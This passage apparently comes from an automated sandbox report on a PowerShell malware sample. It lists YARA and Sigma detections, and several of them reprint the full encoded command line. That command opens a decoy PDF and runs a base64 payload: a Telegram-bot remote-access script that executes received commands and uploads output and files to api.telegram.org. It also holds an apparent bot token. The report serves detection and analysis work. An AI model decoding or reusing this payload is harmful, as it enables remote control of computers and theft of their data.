CAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAuAEgAZQBhAGQAZQByAHMALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ATQBpAG0AZQBNAGEAcABwAGkAbgBnAF0AOgA6AEcAZQB0AE0AaQBtAGUATQBhAHAAcABpAG4AZwAoACQARgBpAGwAZQBQAGEAdABoACkAIAANAAoAIAAgACAAIAANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAE0AdQBsAHQAaQBwAGEAcgB0AEYAbwByAG0ARABhAHQAYQBDAG8AbgB0AGUAbgB0AF0AOgA6AG4AZQB3ACgAKQANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQALgBBAGQAZAAoACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0ACkADQAKACAAIAAgACAADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0AC4AUABvAHMAdABBAHMAeQBuAGMAKAAiACQAVQBSAEwALwBzAGUAbgBkAEQAbwBjAHUAbQBlAG4AdAA/AGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AIgAsACAAJABNAHUAbAB0AGkAcABhAHIAdABDAG8AbgB0AGUAbgB0ACkAIAA+ACAAJABuAHUAbABsAA0ACgB9AA0ACgANAAoAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBNAGUAdABoAG8AZAAgAEcAZQB0ACAALQBVAHIAaQAgACgAJABVAFIATAAgACsAJwAvAGcAZQB0AFUAcABkAGEAdABlAHMAPwBvAGYAZgBzAGUAdAA9ACcAIAArACAAKAAkAGwAYQBzAHQASQBEACAAKwAgADEAKQApACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACQAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAMQAwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAGMAbwBuAHQAaQBuAHUAZQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUALgByAGUAcwB1AGwAdAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB1AHAAZABhAHQAZQBpAGQAIAA9ACAAJABfAC4AdQBwAGQAYQB0AGUAXwBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGYAcgBvAG0AIAA9ACAAJABfAC4AbQBlAHMAcwBhAGcAZQAuAGYAcgBvAG0ALgBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAXwAuAG0AZQBzAHMAYQBnAGUALgB0AGUAeAB0ACkAKQANAAoADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADYAKQAgAC0AZQBxACAAIgAvAHMAbABlAGUAcAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIABbAGkAbgB0AF0AJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADQAKQAgAC0AZQBxACAAIgAvAGMAbQBkACIAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA1ACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgBvAHQAQwBtAGQAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAGMAbwBtAG0AYQBuAGQADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADkAKQAgAC0AZQBxACAAIgAvAGQAbwB3AG4AbABvAGEAZAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABGAGkAbABlAFAAYQB0AGgAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAG0AZAAgAD0AIAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADEALAAgADUAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABpAGQAZQBuAHQAaQBmAGkAZQByACAALQBlAHEAIAAkAGMAbQBkACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUwBMAEUARQBQACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAJAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAAxADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAkAHMAbABlAGUAcABUAGkAbQBlAA0ACgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3084INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1baff6:$b3: ::UTF8.GetString(
  • 0x31c7e6:$b3: ::UTF8.GetString(
  • 0x55c2c:$s1: -join
  • 0x5776f:$s1: -join
  • 0x8acdb:$s1: -join
  • 0x97db0:$s1: -join
  • 0x9b182:$s1: -join
  • 0x9b834:$s1: -join
  • 0x9d325:$s1: -join
  • 0x9f52b:$s1: -join
  • 0x9fd52:$s1: -join
  • 0xa05c2:$s1: -join
  • 0xa0cfd:$s1: -join
  • 0xa0d2f:$s1: -join
  • 0xa0d77:$s1: -join
  • 0xa0d96:$s1: -join
  • 0xa15e6:$s1: -join
  • 0xa1762:$s1: -join
  • 0xa17da:$s1: -join
  • 0xa186d:$s1: -join
  • 0xa1ad3:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQA
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQ
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQ
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAA